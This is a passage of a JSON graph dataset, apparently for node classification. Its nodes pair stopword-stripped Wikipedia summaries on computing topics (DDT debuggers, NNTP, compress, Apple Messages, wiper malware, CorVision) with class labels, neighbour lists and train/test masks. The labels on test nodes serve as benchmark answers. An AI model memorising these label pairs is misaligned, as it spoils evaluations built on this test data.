    "text": "Dynamic_debugging_technique:dynamic debugging technique dynamic debugging technique ddt name several debugger programs originally developed dec hardware initially known dec debugging tape distributed paper tape name pun insecticide i.e bug-killer ddt first version ddt developed mit pdp-1 computer 1961 newer versions newer platforms continued use name ported vendor platforms changing media name changed less dec-centric version ddt closely related odt names used several different debuggers generally debuggers odt name limited capabilities ddt debuggers early versions digital research cp/m cp/m-86 kept dec name ddt ddt-86 ddt-68k debugger however meaning dynamic debugging tool cp/m ddt later superseded symbolic instruction debugger sid zsid sid86 gemsid dr dos gem addition normal function debugger ddt also used top-level command shell mit operating system recent systems replaced pword implements restricted subset ddt functionality ddt could run debug eight processes called jobs time several sessions teco ddt could run recursively jobs could ddts could run another eight jobs eight jobs given unique names usual name original top-most ddt hactrn hack-tran thus guy l. steele famous filk poem parody edgar allan poe raven hactrn ddt dynamic debugging technique implemented decsystem-10 decsystem-20 allowed references symbols within programming debugged feature loaded symbols .exe executable file special version named sddt used symbols running monitor allowed system programmers peek inside",
    "neighbors": [
      10113,
      2181,
      6921,
      1804,
      273,
      2840,
      2201,
      2729,
      7849,
      11562,
      7983,
      178,
      4409,
      7999,
      577,
      4548,
      4423,
      5328,
      6355,
      10067,
      2786,
      10083,
      5220,
      8301,
      2672,
      3056,
      4337,
      9329,
      4727,
      11513,
      6778,
      1147,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 3217,
    "label": 3,
    "text": "The_Untouchables_(video_game):untouchables video game untouchables video game released ocean software 1989 zx spectrum amstrad cpc commodore 64 msx amiga dos later nes snes based film untouchables side-scrolling based loosely movie game plays significant parts film set chicago primary goal game take al capone henchmen eventually detain capone electronic gaming monthly gave super nes version 5.8 10 commenting title would better super scope compatible bit difficult use pad shooting sequences reviewer crash called game great stuff ocean brought chicago life atmospheric title tune 128k beautifully detailed graphics challenging gameplay add one addictive mean game sinclair user commented untouchables cracking conversion easily one successful accurate movie licenses date paul rand computer video games stated untouchables well thought package find niche people software collections ... buy wo n't disappointed games machine added six levels trigger-pumping fun suitable graphics give authentic twenties feel nice touches ... make untouchables winner",
    "neighbors": [
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 3218,
    "label": 5,
    "text": "Network_News_Transfer_Protocol:network news transfer protocol network news transfer protocol nntp application protocol used transporting usenet news articles netnews news servers reading posting articles end user client applications brian kantor university california san diego phil lapsley university california berkeley wrote specification network news transfer protocol march 1986 contributors included stan o. barber baylor college medicine erik fair apple computer usenet originally designed based uucp network article transfers taking place direct point-to-point telephone links news servers powerful time-sharing systems readers posters logged computers reading articles directly local disk local area networks internet participation proliferated became desirable allow newsreaders run personal computers connected local networks resulting protocol nntp resembled simple mail transfer protocol smtp tailored exchanging newsgroup articles newsreader also known news client software application reads articles usenet either directly news server disks via nntp well-known tcp port 119 reserved nntp well-known tcp port 433 nnsp may used bulk transfer articles one server another clients connect news server transport layer security tls tcp port 563 often used sometimes referred nntps alternatively plain-text connection port 119 may changed use tls via codice_1 command october 2006 ietf released updates nntp codifies many additions made years since rfc 977 time ietf also released specifies use transport layer security tls via nntp starttls abortive attempt update nntp standard early 1990s specialized form nntp intended specifically use clients nnrp proposed protocol never completed fully implemented name persisted internetnews inn nnrpd program result subset standard nntp commands useful clients sometimes still referred nnrp",
    "neighbors": [
      6657,
      10242,
      1030,
      3592,
      8211,
      6681,
      6682,
      10269,
      10271,
      6689,
      10786,
      35,
      9251,
      2085,
      10791,
      7208,
      7214,
      8238,
      562,
      1075,
      1586,
      9269,
      11321,
      3133,
      4158,
      5181,
      6723,
      11332,
      10309,
      8265,
      8266,
      4687,
      592,
      98,
      10341,
      10344,
      9834,
      3695,
      4723,
      9843,
      3191,
      2679,
      4729,
      5251,
      9860,
      649,
      9868,
      9365,
      11413,
      152,
      2206,
      3742,
      9380,
      9381,
      3751,
      3752,
      172,
      10924,
      6318,
      6319,
      9909,
      4793,
      6330,
      1211,
      7865,
      4797,
      702,
      8386,
      7364,
      8905,
      1229,
      5843,
      7895,
      10461,
      10462,
      7391,
      3297,
      10979,
      11500,
      2797,
      751,
      8432,
      8946,
      5875,
      11509,
      3322,
      9987,
      3847,
      7943,
      1297,
      10005,
      3350,
      5402,
      5405,
      6431,
      9511,
      7984,
      10035,
      6456,
      8504,
      2362,
      10748,
      829,
      5437,
      11075,
      2373,
      2887,
      10058,
      7500,
      5968,
      849,
      6993,
      1876,
      4439,
      2904,
      7003,
      5469,
      5470,
      5471,
      5472,
      10589,
      1893,
      871,
      11112,
      361,
      5482,
      367,
      891,
      6523,
      6524,
      2431,
      11647,
      10115,
      6541,
      7570,
      5531,
      10144,
      10659,
      933,
      2983,
      9642,
      6577,
      2996,
      10171,
      3006,
      9670,
      2509,
      9167,
      8669,
      8670,
      1506,
      10723,
      10727,
      3564,
      5102,
      4085,
      6651,
      3580,
      5118,
      4095
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3219,
    "label": 1,
    "text": "In-memory_database:in-memory database in-memory database imdb also main memory database system mmdb memory resident database database management system primarily relies main memory computer data storage contrasted database management systems employ disk storage mechanism in-memory databases faster disk-optimized databases disk access slower memory access internal optimization algorithms simpler execute fewer cpu instructions accessing data memory eliminates seek time querying data provides faster predictable performance disk applications response time critical running telecommunications network equipment mobile advertising networks often use main-memory databases imdbs gained lot traction especially data analytics space starting mid-2000s – mainly due multi-core processors address large memory due less expensive ram potential technical hurdle in-memory data storage volatility ram specifically event power loss intentional otherwise data stored volatile ram lost introduction non-volatile random access memory technology in-memory databases able run full speed maintain data event power failure simplest form main memory databases store data volatile memory devices devices lose stored information device loses power reset case imdbs said lack support durability portion acid atomicity consistency isolation durability properties volatile memory-based imdbs often support three acid properties atomicity consistency isolation many imdbs added durability via following mechanisms imdbs allow database schema specify different durability requirements selected areas database thus faster-changing data easily regenerated meaning system shut-down would need journaled durability though would replicated high availability whereas configuration information would flagged needing preservation storing data in-memory confers performance advantages expensive method data storage approach realising benefits in-memory storage limiting costs store frequently accessed data in-memory rest disk since hard distinction data stored in-memory stored disk systems dynamically update data stored based data usage approach subtly different caching recently accessed data cached opposed frequently accessed data stored in-memory flexibility hybrid approaches allow balance struck cloud computing industry terms data temperature hot data cold data emerged describe data stored respect hot data used describe mission-critical data needs accessed frequently cold data describes data needed less often less urgently data kept archiving auditing purposes hot data stored ways offering fast retrieval modification often accomplished in-memory storage always cold data hand stored cost-effective way accepted data access likely slower compared hot data descriptions useful concrete definition hot cold manufacturing efficiency provides another reason selecting combined in-memory/on-disk database system device product lines especially consumer electronics include units permanent storage others rely memory storage set-top boxes example devices require database system manufacturer adopt hybrid database system lower upper cost less customization code rather using separate in-memory on-disk databases respectively disk-less disk-based products first database engine support in-memory on-disk tables single database webdna released 1995 another variation involves large amounts nonvolatile memory server example flash memory chips addressable memory rather structured disk arrays database form memory combines fast access speed persistence reboots power losses",
    "neighbors": [
      2051,
      5640,
      1801,
      6920,
      7946,
      10389,
      4502,
      1049,
      1178,
      9631,
      2339,
      10917,
      8871,
      10921,
      1579,
      8619,
      4781,
      6831,
      7347,
      5051,
      10048,
      5953,
      11203,
      10186,
      4811,
      2901,
      7767,
      4696,
      5209,
      862,
      4194,
      1636,
      9828,
      1136,
      4598,
      3450,
      4604,
      9471
    ],
    "mask": "None"
  },
  {
    "node_id": 3220,
    "label": 7,
    "text": "Lanyon_Solutions:lanyon solutions lanyon solutions inc. privately owned software-as-a-service saas company provided cloud-based software manage meetings events travel lanyon software supported range clients including corporations hotels associations tradeshows convention visitor bureaus cvbs intermediaries meetings events travel space merged cvent 2017 lanyon solutions formed combination two companies active network business solutions group lanyon vista equity partners 2014 two acquisitions added passkey genieconnect 2014 nevertheless solutions services offered individual companies date back decades lanyon founded 1984 nick lanyon irving texas provider software focused corporate transient travel 2009 lanyon received 10 million funding frontier capital charlotte nc-based private equity company expand lanyon product customer sales support company purchased vista equity partners december 2012 signaling exit frontier capital investment company founded 1996 waltham ma-based passkey international provided hotel reservation technology hotels event planners april 2014 lanyon acquired passkey complemented lanyon existing event solutions included passkey groupmax technology enabled hotels destination marketing organizations drive revenue group reservations easing manual tasks associated managing group room blocks starcite founded 1999 spinoff mcgettigan partners company expanded focus desktop consolidation meetings technology acquiring attendee applications provider regweb 2002 attendee product provider b-there 2003 2006 starcite merged onvantage inc. formed merger seeuthere technologies plansoft 2004 bringing together two leaders meetings technology merged company took starcite name products included starcite mobile attendee attendee networking 1:1 meetings schedule meetings business intelligence meetings data analytics suite smm applications supplier database 2008 active network acquired boulder co-based regonline online registration company lindon ut-based wingateweb provided large enterprise event management software january 2012 active network acquired starcite 57.7 million form business solutions group offer smm event marketing software meetings events addition starcite smm business solutions group technology offering included activeworks conference conferences regonline online registration starcite supplier marketplace hotel venue sourcing september 2013 active network acquired vista equity partners 1 billion would return public company private status february 2014 lanyon paired active network business solutions group consolidated lanyon name genieconnect founded 2010 teams us uk apac previously known geniemobile march 2013 uk-based genieconnect offered enterprise-level mobile event technology products included smartconnect provides content based attendee app usage ibeacon-enabled audience response solution marketing track attendee behaviors send messages audiences omnistream event wall aggregate social event activity genieconnect mobile event technology used associations corporations exhibitors expo companies cisco live 2014 genieconnect achieved following results 11,000 attendee profiles updates 7,500 access interactive maps 167,00 plus favorited content mobile app received user rating 4.5 5 stars cisco post-event survey acquired lanyon december 2014 genieconnect mobile technology already integrated many lanyon existing solutions formed early 2014 merger active network business solutions group lanyon lanyon solutions expanded software offering focus several key mergers acquisitions company acquired group hotel reservations company passkey april 2014 mobile application company genieconnect december 2014 lanyon solutions relocated headquarters downtown dallas texas offices draper ut london uk philadelphia pa singapore singapore waltham lanyon serves meetings events travel industries variety software products businesses hotels lanyon large focus enterprise serving 80 fortune 100 10,000 small medium-sized businesses 100,000 hotels company solutions designed manage costs spend data related meetings hotels enabling hoteliers offer venues services corporations associations introduced 2013 lanyon smart events cloud solution brings together strategic meetings management event marketing technologies single solution smart events cloud solution includes products hoteliers lanyon provides rfp management software respond meetings transient erfps hotel booking systems product offerings include",
    "neighbors": [
      9818
    ],
    "mask": "Test"
  },
  {
    "node_id": 3221,
    "label": 9,
    "text": "Command_language:command language command language language job control computing domain-specific interpreted language common examples command language shell batch programming languages languages used directly command line also automate tasks would normally performed manually command line share domain—lightweight automation—with scripting languages though command language usually stronger coupling underlying operating system command languages often either simple grammars syntaxes close natural language shallow learning curve many domain-specific languages",
    "neighbors": [
      8262,
      8295,
      9926,
      7022,
      4782,
      7983,
      9871,
      9714,
      5395,
      9780,
      10387,
      11442
    ],
    "mask": "None"
  },
  {
    "node_id": 3222,
    "label": 6,
    "text": "Compress:compress compress unix shell compression program based lzw compression algorithm compared modern compression utilities gzip bzip2 compress performs faster less memory usage cost significantly lower compression ratio uncompress utility restore files original state compressed using compress utility files specified standard input uncompressed standard output up-coming posix single unix specification revision planned deflate algorithm used gzip format supported utilities files compressed compress typically given extension .z modeled earlier pack program used extension .z tar programs pipe data compress given command line option codice_1 tar program compress stores multiple files within one tape archive files returned original state using uncompress usual action uncompress merely create uncompressed copy file also restore timestamp attributes compressed file files produced compress systems uncompress supports 9- 16-bit compression lzw algorithm used compress patented sperry research center 1983 terry welch published ieee article algorithm 1984 failed note applied patent algorithm spencer thomas university utah took article implemented compress 1984 without realizing patent pending lzw algorithm gif image format also incorporated lzw compression way unisys later claimed royalties implementations gif joseph m. orost led team worked thomas et al create 'final 4.0 version compress published free software 'net.sources usenet group 1985. granted 1985 compress could used without paying royalties sperry research eventually merged unisys compress fallen favor particular user-groups makes use lzw algorithm covered unisys patent gzip bzip2 increased popularity linux-based operating systems due alternative algorithms along better file compression compress however maintained presence unix bsd systems us lzw patent expired 2003 public domain united states patents lzw worldwide also expired see graphics interchange format unisys lzw patent enforcement up-coming posix single unix specification revision planned deflate algorithm used gzip format supported utilities output binary consists bit groups bit group consists codes fixed amount bits 9-16 group except last aligned amount bits multiplied 8 right padded zeroes last group aligned 8 padded zeroes find information ncompress issue example want output 10 9 bit codes output 5 10 bit codes 2 bit groups 100 bits 50 bits first group aligned 72 right padded zeroes second group aligned 8 right padded zeroes need output 100 bits 44 zero bits 50 bits 6 zero bits actually bug lzw n't require alignment bug part original unix compress ncompress gzip even windows port exists 35 years application/x-compress files created using bug include output specification compress implementations writes random bits uninitialized buffer alignment bits guarantee alignment bits zeroes terms 100 compatibility decompressor ignore alignment bit values",
    "neighbors": [
      6022,
      10121,
      1420,
      8975,
      1940,
      5397,
      7702,
      9880,
      3114,
      10027,
      2095,
      7983,
      11442,
      4406,
      4279,
      823,
      6713,
      10817,
      2755,
      11076,
      1352,
      4296,
      3659,
      10317,
      4174,
      5711,
      10575,
      3921,
      722,
      4561,
      3804,
      8414,
      1631,
      3296,
      6369,
      5858,
      9953,
      11614,
      6759,
      5096,
      7529,
      10857,
      4459,
      237,
      1646,
      5357,
      7667,
      5492,
      6389,
      4089,
      894,
      10623
    ],
    "mask": "None"
  },
  {
    "node_id": 3223,
    "label": 4,
    "text": "James_Dolan_(computer_security_expert):james dolan computer security expert james s. dolan july 20 1981 – december 27 2017 american computer security expert aaron swartz kevin poulsen co-developed securedrop widely used secure digital platform sources anonymously submit materials journalists dolan grew chester new york grew four sisters went school tuxedo park school considered gifted early age later moved brooklyn called home chester ny 1999 2006 dolan served marines two deployments iraq war worked data network specialist 2003 dolan served iii marine expeditionary force initial iraq war second deployment september 2004 march 2005 dolan served 4th civil affairs group fallujah one centers conflict time dolan fallujah operation phantom fury part second battle fallujah trevor timm freedom press foundation referenced dolan military service description dolan obituary wrote saying impact serving iraq often spoke motivating factor dolan cybersecurity work goal making metadata transparent accountable service iraq war dolan worked computer security large company 2012 side project job dolan helped develop open source securedrop initially known deaddrop 2013 poulsen dolan moved freedom press foundation ensure continued development adoption following death fellow developer aaron swartz dolan lead maintainer deaddrop freedom press foundation first employee performed outreach assisted installations news organizations included new yorker propublica washington post vice news among others 2015 dolan moved san diego california work head security classy american software company online fundraising platform designed nonprofit organizations position held time death dolan found dead brooklyn hotel december 2017 age 36 former colleagues speculate james died suicide fate swartz reportedly suffered ptsd time marines dolan second member securedrop team commit suicide gofundme fund set fellow marines establish james dolan memorial fund annually donate designated non-profit foundations projects name",
    "neighbors": [
      11659,
      11221,
      2558,
      743
    ],
    "mask": "None"
  },
  {
    "node_id": 3224,
    "label": 8,
    "text": "Text_Template_Transformation_Toolkit:text template transformation toolkit microsoft text template transformation toolkit usually referred t4 template based text generation framework included visual studio t4 source files usually denoted file extension .tt t4 used developers part application tool framework automate creation text files variety parameters text files ultimately text format code example c xml html xaml t4 uses custom template format contain .net code string literals parsed t4 command line tool .net code compiled executed output executed code text file generated template t4 also completely run within .net applications via use texttransformation class eliminates need end user visual studio installed t4 used within microsoft asp.net mvc creation views controllers ado.net entity framework entity generation asp.net dynamic data also used outside microsoft projects subsonic t4 templating also supported monodevelop four types controls handed t4 template transformation engine microsoft often criticized lack tooling support t4 within visual studio ide relies third parties namely tangible engineering clarius consulting however later revisions included better tooling support",
    "neighbors": [
      10243,
      10769,
      1043,
      1055,
      2083,
      8227,
      1577,
      2603,
      4143,
      9263,
      11316,
      1077,
      6709,
      8246,
      8757,
      4674,
      4174,
      4178,
      83,
      9813,
      603,
      608,
      2145,
      10338,
      617,
      1656,
      5754,
      9340,
      5761,
      5765,
      10886,
      2183,
      4231,
      5259,
      653,
      6797,
      10900,
      10902,
      11414,
      4771,
      7846,
      6827,
      10414,
      4289,
      8391,
      5320,
      10957,
      214,
      9943,
      9434,
      2783,
      736,
      4321,
      6370,
      4836,
      1770,
      11498,
      3821,
      10991,
      2804,
      4356,
      11524,
      782,
      6927,
      9491,
      11030,
      5401,
      11549,
      4384,
      7970,
      2854,
      11559,
      1832,
      10024,
      10026,
      3890,
      11570,
      7486,
      5952,
      1347,
      1348,
      9033,
      844,
      847,
      11605,
      1366,
      10079,
      11103,
      2401,
      11616,
      7523,
      2943,
      10624,
      9609,
      9612,
      1935,
      7064,
      9114,
      3997,
      10654,
      8607,
      11683,
      4010,
      10157,
      6584,
      2493,
      7629,
      4051,
      11221,
      8161,
      6114,
      8681,
      7658,
      9196,
      4590,
      3573,
      9205,
      10229,
      9726,
      5119
    ],
    "mask": "Test"
  },
  {
    "node_id": 3225,
    "label": 4,
    "text": "Wiper_(malware):wiper malware wiper class malware whose intention wipe hard drive computer infects piece malware referred wiper allegedly used attacks iranian oil companies 2012 international telecommunication union supplied kaspersky lab hard drives allegedly damaged wiper analysis sample alleged malware could found kaspersky discovered traces separate piece malware known flame shamoon malware contained disk wiping mechanism employed 2012 2016 malware attacks targeting saudi energy companies utilized commercial direct drive access driver known rawdisk original variant overwrote files portions image burning u.s. flag 2016 variant nearly identical except using image body alan kurdi instead wiping component used part malware employed lazarus group—a cybercrime group alleged ties north korea 2013 south korea cyberattack 2014 sony pictures hack sony hack also utilized rawdisk 2017 computers several countries—most prominently ukraine infected variant petya ransomware modified effectively act wiper malware infects master boot record payload encrypts internal file table ntfs file system although still demanded ransom found code significantly modified payload could actually revert changes ransom successfully paid",
    "neighbors": [
      7809,
      9762,
      5764,
      11368,
      11152,
      2193,
      1970,
      7515,
      3423
    ],
    "mask": "None"
  },
  {
    "node_id": 3226,
    "label": 3,
    "text": "Interlock_(engineering):interlock engineering interlock feature makes state two mechanisms functions mutually dependent may used prevent undesired states finite-state machine may consist electrical electronic mechanical devices systems applications interlock used help prevent machine harming operator damaging preventing one element changing state due state another element vice versa elevators equipped interlock prevents moving elevator opening doors prevents stationary elevator open doors moving although idiot proof strategies interlock confused simple safety switch example typical household microwave oven switch disables magnetron door opened interlock rather would considered interlock door locked magnetron magnetron prevented operating door open interlocks may include sophisticated elements curtains infrared beams photodetectors computer containing interlocking computer program digital analogue electronics simple switches locks trapped key interlocking method ensuring safety industrial environments forcing operator predetermined sequence using defined selection keys locks switches called trapped key works releasing trapping keys predetermined sequence control power isolated key released used grant access individual multiple doors example prevent access inside electric kiln trapped key system may used interlock disconnecting switch kiln door switch turned key held interlock attached disconnecting switch open kiln door switch first opened releases key key used unlock kiln door key removed switch interlock plunger interlock mechanically prevents switch closing power re-applied kiln kiln door locked releasing key key returned disconnecting switch interlock similar two-part interlock system used anywhere necessary ensure energy supply machine interrupted machine entered adjustment maintenance microprocessor architecture interlock hardware stalls pipeline inserts bubbles hazard detected hazard cleared one example hazard software program loads data system bus calls use data following cycle system loads take multiple cycles load-to-use hazard interlocks may strictly mechanical one form internal firearm safety blocks motion trigger sear and/or firing pin unless breech properly closed locked operation device press cutter hand fed workpiece hand removed use two buttons actuate device one hand greatly reduces possibility operation endangering operator system fool-proof systems often augmented use cable–pulled gloves worn operator retracted away danger area stroke machine major problem engineering operator safety tendency operators ignore safety precautions even outright disabling forced interlocks due work pressure factors therefore safeties require perhaps must facilitate operator cooperation many people use generators supplement power home business event main municipal power gone offline order safely transfer power source generator back main safety interlock often employed interlock consists one switches prevent main power generator power powering dwelling simultaneously without safeguard power sources running could cause overload condition generator power back-feed onto main could cause dangerous voltage reach lineman repairing main feed far outside building interlock device designed allow generator provide backup power way prevents main generator power connected time b allows circuit breakers operate normally without interference event overload condition interlock devices electrical systems employ mechanical device manage movement circuit breakers also allow use padlocks prevent someone accidentally activating main power system without authorization",
    "neighbors": [
      8036,
      8523,
      1272,
      10781,
      2623
    ],
    "mask": "None"
  },
  {
    "node_id": 3227,
    "label": 3,
    "text": "AGRIS:agris agris international system agricultural science technology global public domain database 9 million structured bibliographical records agricultural science technology became operational 1975 database maintained ciard content provided 150 participating institutions 65 countries agris search system allows scientists researchers students perform sophisticated searches using keywords agrovoc thesaurus specific journal titles names countries institutions authors information management flourished 1970s agris metadata corpus developed allow users free access knowledge available agricultural science technology agris developed international cooperative system serve developed developing countries advent internet along promises offered open access publishing growing awareness management agricultural science technology information would various facets standards methodologies interoperability facilitation knowledge exchange tools enable information management specialists process data information knowledge exchange across countries common interoperability criteria thus adopted implementation agris ap metadata accordingly created order allow exchange retrieval agricultural information resources agris covers wide range subjects related agriculture science technology including forestry animal husbandry aquatic sciences fisheries human nutrition extension content includes unique grey literature unpublished scientific technical reports theses conference papers government publications growing number around 20 bibliographical records corresponding full text document web easily retrieved google 5 december 2013 agris 2.0 released agris 2.0 time access agris repository provided agris search engine agris data converted rdf resulting linked dataset created 200 million triples agris also registered data hub http //thedatahub.org/dataset/agris agris partners contributing agris database use several formats exchanging data including simple dc oai-pmh systems agris ap format anyway adopted directly falling umbrella ciard joint initiative co-led cgiar gfar fao new agris aims promote sharing management agricultural science technology information use common standards methodologies incorporate web 2.0 features order make search experience comprehensive intuitive far-reaching possible users new agris furthermore new agris also leverage data infrastructure one ciard projects ciard ring acronym standing routemap information nodes gateways ring ciard ring project led gfar aims directory ard agricultural research development information services allow monitoring describing classifying existing services whilst benchmarking interoperability criteria ensure maximum outreach global availability",
    "neighbors": [
      10452,
      2948,
      7599
    ],
    "mask": "None"
  },
  {
    "node_id": 3228,
    "label": 2,
    "text": "Messages_(Apple):messages apple messages instant messaging software application developed apple inc. macos ios watchos operating systems desktop messages application replaced ichat native os x instant messaging client release os x mountain lion july 2012 inherits majority ichat features messages also brings support imessage apple messaging service ios well facetime integration mobile version messages ios used iphone ipad also supports sms mms due replacing older text messaging text app since ios 3 users tell difference message via sms one sent imessage bubbles appear either green sms blue imessage apple released messages iphone built-in application iphone os 3.0 june 17 2009 replaced text application native messaging application since iphone inception change name due iphone gaining native support mms protocol addition previously available sms protocol even though iphone 3g newly released iphone 3gs original iphone received os 3.0 update original iphone left support mms citing hardware challenges messages also gained support sharing contacts using vcard standard big changes included support copy paste ability forward delete multiple messages time release iphone os 4.0 name later changed ios 4.0 2010 messages received minor upgrade among new features ability search within text messages much like search feature mail also added support displaying character count notify one gone standard sms character limit ios 4.0 also included support red exclamation mark appear app icon warn failure send message developers provided new api allowed add embedded messaging functionality apps ipad ipod touch gained support messages release ios 5.0 october 12 2011 unlike iphone supported sms mms imessage ipad ipod touch supported apple imessage protocol imessage users ios 5 could send text picture messages contacts wifi 3g ios 5 devices without using carrier quota addition user could start conversation one device continue another messages also introduced typing indication delivery read receipts imessage introduction notification center new sms mms imessages could seen lock screen pulling notification center ios 6 helped improve syncing multiple devices ipod touch ipad users could use iphone phone numbers send receive imessages earlier iphone users could receive imessages sent phone number ipad ipod touch addition users could add additional emails receive send messages device settings accessible settings application messages tab ios 6 also added share button apps like safari photos enabled users share links photos using sms/mms imessage without leaving app ios 7 messages received new user interface apple also allowed users see message post date swiping messages view right left ios 8 users send audio video messages holding record button group conversations users remove/add someone thread name thread share location thread view attachments turn disturb receive notifications specific thread part new continuity feature users use iphones relay send receive sms mms messages macs ipads ios 9 app received redesigned overlay sending audio clip well seeing contact photos list view iphone 6 later ios 10 app app store allowing user download third-party messages apps apps allow user send stickers play games within messages app app received new visual effects example chat bubbles sent loud gentle effect messages announced os x beta application february 16 2012 macs running mac os x 10.7 lion released conjunction developer preview apple to-be-released os mountain lion 10.8 beta discontinued december 12 2012 3 months release mountain lion full-version messages os x released july 25 2012 included mountain lion messages replaced ichat default im client since mac os x 10.2 addition supporting apple new imessage protocol messages os x retained support aim yahoo messenger google talk jabber messages unitizes newly added notification center notify incoming messages introduction new share button applications like safari finder preview gave users ability share links webpages photos files messages also supported dragging dropping files photos sharing messages also supports video calling apple facetime third-party im services supports release 10.8.2 messages os x gained ability send receive imessages using iphone phone number yosemite app redesigned look like app ios 7 8 part new continuity feature users able send receive sms mms messages iphones running ios 8 possibility reopen previous conversations removed embedded control font size character format within sent messages removed headlining feature ios 5 messages widely reviewed met fairly positive reviews dante cesa engadget review praised brilliance apple execution messages complimented way messages change earlier sms ui would automatically convert sms/mms imessage recipient registered imessage sms/mms stopped using service dan moren macworld also praise apple execution saying ... explain less technically savvy friends send free message instead sms done automatically feature widely praised anandtech praised apple technical achievements messages particularly imessage noted away sms character limits 140 160 helped eliminate messages sent received split two messages tests found apple actually prioritized using cellular networks send text messages opposed wifi networks spite possibly incurring data costs claimed data usage text based imessage small enough ignore especially considered cellular networks secure wifi protected picture video messages apple prioritized wifi given much higher data consumption compared text criticism messages relates imessage release ios 6 os x mountain lion 10.8.2 inability receive imessages sent one iphone phone number ipad ipod touch mac criticized feature addressed ios 6 iphones ipads ipod touches os x 10.8.2 macs messages also came fire due multiple cases apple icloud service going messages relies icloud send receive imessages using apple voiceover screen reader ios macos visually impaired users tap message read also navigate messages ui using voice utilizing siri messages enables one dictate send messages commands siri also able read new incoming messages default font size ios messages editable accessibility tab settings application",
    "neighbors": [
      10242,
      10755,
      9732,
      4615,
      1036,
      1549,
      5647,
      7697,
      1042,
      11289,
      3610,
      10271,
      3105,
      6186,
      4139,
      6700,
      4657,
      1074,
      8754,
      8758,
      9784,
      8253,
      576,
      6208,
      9802,
      8783,
      5713,
      4180,
      3670,
      1623,
      3672,
      4184,
      10838,
      2141,
      4702,
      3681,
      9826,
      2149,
      8806,
      3691,
      8303,
      2673,
      6771,
      2676,
      7292,
      2686,
      6783,
      9343,
      10878,
      5251,
      3719,
      10888,
      4746,
      11402,
      11408,
      8852,
      1686,
      7318,
      5784,
      1177,
      2207,
      1699,
      11430,
      5292,
      8877,
      1710,
      2735,
      3248,
      3766,
      2232,
      9912,
      4283,
      3772,
      7869,
      9406,
      1729,
      1218,
      6849,
      6855,
      2760,
      713,
      1738,
      9418,
      3790,
      7378,
      2259,
      3284,
      3286,
      9430,
      3289,
      3293,
      4318,
      3812,
      6884,
      231,
      9451,
      1772,
      4844,
      2288,
      7928,
      8441,
      7420,
      7422,
      11521,
      2819,
      1796,
      5382,
      1290,
      3338,
      784,
      10512,
      4888,
      5912,
      11037,
      9511,
      10023,
      811,
      3371,
      4399,
      7983,
      9519,
      10036,
      7991,
      9529,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      4933,
      6982,
      7496,
      9035,
      2892,
      1878,
      4957,
      6495,
      9572,
      9063,
      4457,
      3948,
      10608,
      3959,
      3460,
      2439,
      6023,
      6539,
      7052,
      9100,
      9109,
      3483,
      1439,
      2979,
      1962,
      8109,
      1467,
      2492,
      446,
      7614,
      2502,
      456,
      1482,
      6093,
      7118,
      464,
      8662,
      9174,
      3035,
      4571,
      7133,
      9182,
      4068,
      5093,
      6628,
      487,
      2023,
      10221,
      7154,
      5619,
      11257,
      7163,
      10748,
      6654
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3229,
    "label": 9,
    "text": "Jsish:jsish javascript interpreter shell jsish jsi short scripting language designed use embedded systems language used primarily applications written c c++ using gnu tool-chains mingw provides windows compatibility jsi code compiles either c99 c++ c++ support native instead extern c jsi created embedded application replacement tcl jimtcl main goal provide embedded scripting using mostly standard syntax javascript opposed idiosyncratic ones used tcl lua python secondary goal data compatibility web browsers using json speed major goal life jsi started fork quad-wheel interpreter eventually major internal features tcl added current implementation nearly 10 times size original little original code remains jsi comes builtin support sqlite websocket self-hosting zip file-systems codice_1 executable unusual integrates self-mounting file system containing builtin utilities applications include debugger web-server latter used provide web user-interfaces debugger sqlite applications accessed via codice_1 command-line arguments jsi highly independent scripts extensions unusually robust due functions support duck typed-parameters implementation mature rich resilient development environment includes integrated logging asserts strict mode version 2.4 released december 2017 jsi considered feature-stable jsi implements version 5.1. ecmascript standard following deviations one major extension function definitions use types defaults",
    "neighbors": [
      3969,
      9345,
      5635,
      2181,
      3462,
      6797,
      8854,
      546,
      4777,
      5546,
      7983,
      2864,
      692,
      9780,
      438,
      1101,
      8909,
      8147,
      11219,
      4437,
      10971,
      8289,
      10851,
      9320,
      8554,
      9834,
      5612,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3230,
    "label": 9,
    "text": "CorVision:corvision corvision fourth generation programming tool 4gl currently owned attunity inc. corvision developed cortex corporation vax/vms isam environment although cortex beta tested corvision-10 generated pcs corvision stayed anchored vms corvision-10 proved difficult hoped never released corvision traced back 1972 lou santoro mike lowery created inform newly formed time-sharing company standard information systems sis inform contained corvisions basic utility commands sort report list consolidate first users inform new england telephone polaroid temple barker sloan 1972 sis offices los angeles garden grove minneapolis chicago boston new york city district columbia charlotte raleigh atlanta phoenix 1976 1977 ken levitt dick berthold sis ported inform cdc-3600 pdp-11/70 ias called new tool inform-11 cortex founded 1978 sherm uchill craig hill mike lowery dick berthold market inform-11 inform-11 first used deliver 20-user order entry system eddie bauer deliver insurance processing system consolidated group trust 1981 1982 cortex received significant investment b. dick using new investment cortex ported inform digital equipment corporation new vax/vms adding compiled executables inform-11 promoted cortex digital pioneering rapid application development system 1984 jim warner encapsulated inform repository-based development tool called application factory inform process procedural language became known builder within application factory 1986 name application factory dropped favor name corvision 1986 1989 corvision experienced heyday quickly became known robust capable tool rapidly building significant multi-user applications addition relational database support attracted major accounts cortex quickly became international company 1992 corvision version 5 released query support unix query allowed read-only access users developers systems database backend seemed desirable facility allowing users create use throw away reports without calling developers nasty habit causing performance issues users often understand database structure could send large queries processing queues causing system-wide issues 1993 cortex started supported vesting digital new 64-bit alpha line 1994 international software group co. ltd. isg purchased cortex early 1987 cortex recognized growth popularity ibm pc supporting wikt diagrammatic editing menus data relationships corvision 1993 client-server version released widely adopted 1997 isg work corvision-10 herald rebirth corvision onto ibm pc platform stopped corvision-10 proving difficult port isg finally refused spend money now-dated system 1994 saw last innovative corvision release v5.11 extra-fee y2k release v5.12.2 marked end development corvision still exists handful companies yet found time money upgrade existing mainframe systems corvision runs vms environment stable search corvision developers contractors support ageing systems problem since around 1999 companies started appearing offering conversion tools convert builder code compiled visual basic java 2005 corvision guru michael lowery president order processing technologies attempted revive corvision franchise cv2vb process convert corvision applications .net applications using sql server cv2vb opt third generation corvision conversion replacement modeler/code generator commercial service former corvision clients information available cv2vb website brief explanation application development using corvison first step developing application corvision fill parameters control miscellaneous aspects concerning application-wide functions 